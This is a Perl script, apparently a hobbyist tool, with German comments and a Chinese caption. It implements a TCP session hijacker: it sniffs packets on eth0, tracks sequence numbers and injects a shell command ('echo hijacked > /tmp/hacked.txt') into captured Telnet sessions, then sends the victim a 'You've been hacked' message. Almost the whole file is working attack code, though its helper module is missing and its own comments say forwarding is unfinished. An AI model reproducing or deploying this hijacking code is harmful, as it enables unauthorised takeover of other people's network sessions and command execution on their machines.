easterjack.pl

一个rst守护程序

#!/usr/bin/perl
# Einfacher TCP-Hijacker
# ToDo
# ----
# - Fehler bei Connection-Detection (bei sich neuaufbauenden Connections
# - z.Zt. nur Telnet-Sessions angreifbar
# - Paket-Forwarding funzt noch nicht
#
# Autor: stefan@krecher.de
# TheMidget
#
# Lizenz: GPL

use Net::PcapUtils;
use NetPacket::Ethernet qw(:strip);
use NetPacket::IP qw(:strip);
use NetPacket::TCP;

use Connection;

$device = "eth0";  # Netzwerkdevice
$connection;
$hackstring = "echo hijacked > /tmp/hacked.txt\n";
$clientMessage = "\nYou've been hacked by TheMidget\n";

sub process_pkt {
  my($arg, $hdr, $pkt) = @_;
  my $ip_obj = NetPacket::IP->decode(eth_strip($pkt));
  my $i = 0;  # der original-standard Schleifeniterator
  if (!($connection)) {
    $connection = Connection->new($ip_obj);
  }
  if (($connection->check($ip_obj)) == 1) { # Paket "matcht" 
    $connection->updateWith($ip_obj); # Sequenznummern updaten
  }

  print $connection->asString(); print "\n";

  if ($connection->isHijacked()) {
    sleep 5;  # Wartet noch 5 Sekunden (damit auch wirklich alles ankommt
#    $connection->resetRST();
    $connection->forward($ip_obj);
    exit (0);
  }
  if ( $connection->isHijackable() && (!($connection->isHijacked)) ) {
    print "\nEs kann los gehen ... Hijacking connection " . $connection->asString . "\n\n";
    $connection->infiltrate($hackstring);
    $connection->noticeClient($clientMessage);
    $connection->setIsHijacked();
  }
}

Net::PcapUtils::loop(\&process_pkt, 
                     FILTER => 'tcp', 
                     DEV => $device
                    );